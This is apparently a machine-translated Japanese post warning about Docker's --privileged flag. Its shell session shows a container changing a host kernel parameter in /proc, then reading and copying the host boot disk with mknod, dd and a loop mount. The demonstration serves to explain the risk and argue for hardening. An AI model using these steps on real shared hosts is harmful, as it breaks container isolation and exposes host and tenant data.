特権コンテナと機能

--privilegedを使用してコンテナを実行する必要はありません。

NVMeドライブを搭載したラップトップでこれを行っていますが、どのホストでも機能します。

docker run --privileged -t -i --rm ubuntu:latest bash

まず、/ procファイルシステムをテストするために、ちょっとしたことをしましょう

コンテナから：

root@507aeb767c7e:/# cat /proc/sys/vm/swappiness
60
root@507aeb767c7e:/# echo "61" > /proc/sys/vm/swappiness    
root@507aeb767c7e:/# cat /proc/sys/vm/swappiness
60

OK、コンテナまたはホスト用に変更しましたか？

$ cat /proc/sys/vm/swappiness
61

おっと！ホストカーネルパラメーターは任意に変更できます。しかし、これは単なるDOSの状況です。親ホストから特権情報を収集できるかどうかを確認しましょう。

/sysツリーを歩いて、ブートディスクのメジャーマイナー番号を見つけましょう。

注：2つのNVMeドライブがあり、コンテナは別のドライブのLVMで実行されています

root@507aeb767c7e:/proc# cat /sys/block/nvme1n1/dev
259:2

OK、dbusルールが自動スキャンしない場所にデバイスファイルを作成しましょう。

root@507aeb767c7e:/proc# mknod /devnvme1n1 b 259 2
root@507aeb767c7e:/proc# sfdisk -d /devnvme1n1 
label: gpt
label-id: 1BE1DF1D-3523-4F22-B22A-29FEF19F019E
device: /devnvme1n1
unit: sectors
first-lba: 34
last-lba: 2000409230
<SNIP>

ブートディスクを読み取って、パーティションの1つにデバイスファイルを作成します。開いているためマウントできませんが、ddを使用してコピーできます。

root@507aeb767c7e:/proc# mknod /devnvme1n1p1 b 259 3
root@507aeb767c7e:/# dd if=devnvme1n1p1 of=foo.img
532480+0 records in
532480+0 records out
272629760 bytes (273 MB, 260 MiB) copied, 0.74277 s, 367 MB/s

OK、マウントして、私たちの努力がうまくいったかどうかを確認しましょう!!!

root@507aeb767c7e:/# mount -o loop foo.img /foo
root@507aeb767c7e:/# ls foo
EFI
root@507aeb767c7e:/# ls foo/EFI/
Boot  Microsoft  ubuntu

したがって、基本的に、誰でも--privilegedコンテナを起動できるコンテナホストは、そのホスト上のすべてのコンテナへのルートアクセスを許可することと同じです。

残念なことに、Dockerプロジェクトは信頼できるコンピューティングモデルを選択しており、認証プラグイン以外ではこれを保護する方法がないため、必要な機能を追加する場合と--privilegedを使用する場合は常に誤りがあります。

これをカバーするRedHatの良い記事 があります。

「ルート」として実行されているdockerコンテナは、ホスト上のルートよりも低い権限を持ちますが、ユースケースによっては強化が必要になる場合があります（開発環境と共有本番クラスターとして使用）。